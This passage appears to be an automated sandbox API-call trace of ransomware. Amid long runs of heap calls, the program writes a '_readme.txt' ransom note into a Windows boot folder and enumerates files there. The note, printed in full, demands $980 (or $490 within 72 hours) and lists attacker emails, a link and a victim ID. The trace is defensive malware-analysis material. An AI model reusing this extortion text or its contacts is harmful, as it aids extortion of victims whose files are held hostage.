hHeap=0x620000) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.730] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.731] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.749] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0183.749] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.750] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.750] PathFindFileNameW (pszPath="") returned="" [0183.750] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.750] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.750] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.750] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.751] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0183.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.751] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0183.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.753] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.753] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.753] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.754] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.755] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.755] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.755] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0183.755] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0183.755] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.756] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.759] RtlAllocateHeap (HeapHandle=0x620000, 